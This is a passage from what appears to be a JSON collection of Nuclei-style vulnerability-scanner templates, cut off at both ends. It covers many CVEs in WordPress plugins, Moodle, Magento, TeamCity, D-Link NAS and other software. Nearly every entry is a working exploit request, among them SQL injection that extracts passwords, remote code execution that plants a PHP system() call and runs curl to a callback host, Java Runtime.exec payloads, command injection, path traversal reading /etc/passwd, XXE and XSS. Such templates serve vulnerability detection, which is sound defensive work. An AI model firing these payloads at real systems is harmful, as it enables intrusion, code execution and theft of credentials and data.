image/jpeg\n\n{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}\n------WebKitFormBoundaryaquxwjsn--\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["has been uploaded to:"]}]},{"raw":["GET /assets/data/usrimg/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["atfersotg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6028","info":{"name":"Quiz Maker <= 6.5.8.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"status\\\":\",\"scoreMessage\",\"displayScore\")"],"condition":"and"}]}]},{"id":"CVE-2024-43425","info":{"name":"Moodle - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n"],"host-redirects":true,"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]},{"raw":["GET /my/courses.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"sesskey","part":"body","internal":true,"group":1,"regex":["\"sesskey\":\"([^\"]+)\""]}]},{"raw":["POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[{\"index\":0,\"methodname\":\"core_course_get_enrolled_courses_by_timeline_classification\",\"args\":{\"offset\":0,\"limit\":0,\"classification\":\"all\",\"sort\":\"fullname\",\"customfieldname\":\"\",\"customfieldvalue\":\"\",\"requiredfields\":[\"id\",\"fullname\",\"shortname\",\"showcoursecategory\",\"showshortname\",\"visible\",\"enddate\"]}}]\n"],"extractors":[{"type":"json","part":"body","name":"courseid","json":[".[].data.courses[0].id"],"internal":true}]},{"raw":["POST /question/bank/editquestion/question.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ninitialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes\n"],"extractors":[{"type":"regex","part":"header","name":"id","group":1,"internal":true,"regex":["&id=([0-9]+)&"]}]},{"raw":["POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page\n"],"extractors":[{"type":"regex","part":"header","name":"rceurl","group":1,"internal":true,"regex":["Location: https?://.*?/question/(.*)&returnurl"]}]},{"raw":["GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4956","info":{"name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-10915","info":{"name":"D-Link NAS - Command Injection via Group Parameter","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["id","ifconfig"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)","contains_all(body, 'inet addr:', 'Mask:')"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"Content-type: text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6746","info":{"name":"EasySpider 0.6.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["GET /taskGrid/tasklist.html HTTP/1.1\nHost: {{Hostname}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Task List\",\"Task ID\",\"Task Name\",\"URL\",\"<title>\u4efb\u52a1\u5217\u8868 | Task List</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-48914","info":{"name":"Vendure - Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/../package.json"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\", \"version\", \"main\" ,\"license\")","contains(content_type, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /gremlin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"SL7\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"ping\\\", \\\"{{interactsh-url}}\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"inputStream\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-7714","info":{"name":"AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"],"matchers":[{"type":"dsl","dsl":["regex(\"^true$\", body)","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34102","info":{"name":"Adobe Commerce & Magento - CosmicSting","severity":"critical"},"requests":[{"raw":["POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(content_type, \"application/json\")","contains_any(body, \"log file\", \"cartId\", \"no Route\")","contains(body, \"message\")"],"condition":"and"}]}]},{"id":"CVE-2024-3822","info":{"name":"Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<p><script>alert(\\\"document.domain\\\")</script></p>\")"],"condition":"and"}]}]},{"id":"CVE-2024-21644","info":{"name":"pyLoad Flask Config - Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/render/info.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&#39;SECRET_KEY&#39;:","&#39;pyload_session&#39;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5765","info":{"name":"WpStickyBar <= 2.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body, \"/plugins/wpstickybar-sticky-bar-sticky-header\")"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stickybar_display&banner_id=1%20AND%20SLEEP(6);\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-38289","info":{"name":"TurboMeeting - Boolean-based SQL Injection","severity":"critical"},"requests":[{"raw":["POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n","POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["<__Status__>SUCCEED</__Status__>"]},{"type":"word","part":"body_2","words":["<__Status__>FAILED</__Status__>"]}]}]},{"id":"CVE-2024-37152","info":{"name":"Argo CD Unauthenticated Access to sensitive setting","severity":"medium"},"requests":[{"raw":["GET /api/v1/settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"passwordPattern\":","\"appLabelKey\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9487","info":{"name":"GitHub Enterprise - SAML Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /saml/consume HTTP/1.1\nHost: {{Hostname}}\nCookie: saml_csrf_token={{RelayState}}; saml_csrf_token_legacy={{RelayState}};\nContent-Type: application/x-www-form-urlencoded\n\nRelayState={{RelayState}}&SAMLResponse={{code_response}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header,\"dotcom_user\")","status_code == 302"],"condition":"and"}],"extractors":[{"type":"kval","kval":["user_session"]}]}]},{"id":"CVE-2024-1209","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","slug\":\"assignment",".pdf\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-44349","info":{"name":"AnteeoWMS < v4.7.34 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /default.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"viewstate","internal":true,"group":1,"regex":["id=\"__VIEWSTATE\" value=\"([/a-zA-Z0-9+=]+?)\""]},{"type":"regex","part":"body","name":"viewstategen","internal":true,"group":1,"regex":["id=\"__VIEWSTATEGENERATOR\" value=\"([A-Z0-9]+)\""]},{"type":"regex","part":"body","name":"eventval","internal":true,"group":1,"regex":["id=\"__EVENTVALIDATION\" value=\"([/a-zA-Z0-9+=]+)\""]}]},{"raw":["POST /default.aspx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server"]}]}]},{"id":"CVE-2024-32964","info":{"name":"Lobe Chat <= v0.150.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /welcome HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"lobechat\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /api/proxy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\n\nhttp://oast.me\n"],"matchers":[{"type":"word","part":"response","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2024-44000","info":{"name":"LiteSpeed Cache <= 6.4.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/litespeed-cache\")"],"internal":true}]},{"raw":["GET /wp-content/debug.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"response","regex":["(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39250","info":{"name":"EfroTech Timetrax v8.3 - Sql Injection","severity":"high"},"requests":[{"raw":["GET /Login.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"TimeTrax - Cloud HR Software\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /search.aspx?q=' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Incorrect syntax near\",\"Unclosed quotation mark after the character string\")","contains(content_type, \"text/html\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2024-9593","info":{"name":"Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/time-clock\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2024-6205","info":{"name":"PayPlus Payment Gateway < 6.6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","regex('^-1$', body)","contains(content_type,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-32231","info":{"name":"Stash < 0.26.0 -  SQL Injection","severity":"critical"},"requests":[{"raw":["POST /graphql HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json\n\n{\"operationName\":\"FindPerformers\",\"variables\":{\"filter\":{\"q\":\"\",\"page\":1,\"per_page\":40,\"sort\":\"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -\",\"direction\":\"ASC\"},\"performer_filter\":{}},\"query\":\"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\\n  findPerformers(\\n    filter: $filter\\n    performer_filter: $performer_filter\\n    performer_ids: $performer_ids\\n  ) {\\n    count\\n    performers {\\n      ...PerformerData\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\\nfragment PerformerData on Performer {\\n  id\\n  name\\n  disambiguation\\n  url\\n  gender\\n  twitter\\n  instagram\\n  birthdate\\n  ethnicity\\n  country\\n  eye_color\\n  height_cm\\n  measurements\\n  fake_tits\\n  penis_length\\n  circumcised\\n  career_length\\n  tattoos\\n  piercings\\n  alias_list\\n  favorite\\n  ignore_auto_tag\\n  image_path\\n  scene_count\\n  image_count\\n  gallery_count\\n  movie_count\\n  performer_count\\n  o_counter\\n  tags {\\n    ...SlimTagData\\n    __typename\\n  }\\n  stash_ids {\\n    stash_id\\n    endpoint\\n    __typename\\n  }\\n  rating100\\n  details\\n  death_date\\n  hair_color\\n  weight\\n  __typename\\n}\\n\\nfragment SlimTagData on Tag {\\n  id\\n  name\\n  aliases\\n  image_path\\n  parent_count\\n  child_count\\n  __typename\\n}\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["converting driver\\.Value type string \\(\\\\\"3.*?\\\\\"\\) to a int: invalid syntax"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37881","info":{"name":"SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"SiteGuard WP Plugin\")"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-register.php"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-27199","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/../admin/diagnostic.jsp","{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp","{{BaseURL}}/update/../admin/diagnostic.jsp"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"Debug Logging\", \"CPU & Memory Usage\")"],"condition":"and"}]}]},{"id":"CVE-2024-3136","info":{"name":"MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stm_lms_load_content&nonce={{nonce}}&\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_2),\"config-create: must have 2 parameters\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["\"load_content\":\"(\\w+?)\""],"group":1,"internal":true,"name":"nonce"}]}]},{"id":"CVE-2024-5827","info":{"name":"Vanna - SQL injection","severity":"critical"},"requests":[{"raw":["POST /api/v0/train HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"sql\":\"SELECT pg_read_file('/etc/passwd', 0, 1000);\"}\n"],"matchers":[{"type":"word","words":["id\":"],"internal":true}]},{"raw":["GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2024-28255","info":{"name":"OpenMetadata - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(interactsh_protocol, 'dns')","contains(body, \"java.lang.Boolean\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-37843","info":{"name":"Craft CMS <=v3.7.31 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type:application/json\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\\\", limit: 5){filename}}\"}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General error: 1105 XPATH syntax error: '\\n{{matcher}}"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-45388","info":{"name":"Hoverfly < 1.10.3 - Arbitrary File Read","severity":"high"},"requests":[{"raw":["PUT /api/v2/simulation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","hoverflyVersion"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-46310","info":{"name":"FXServer < v9601 - Information Exposure","severity":"medium"},"requests":[{"raw":["GET /players.json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"endpoint\", \"id\", \"identifiers\", \"name\", \"ping\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-FaceThumb ==="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["2 Click Social Media Buttons","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["MF Gig Calendar ="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: 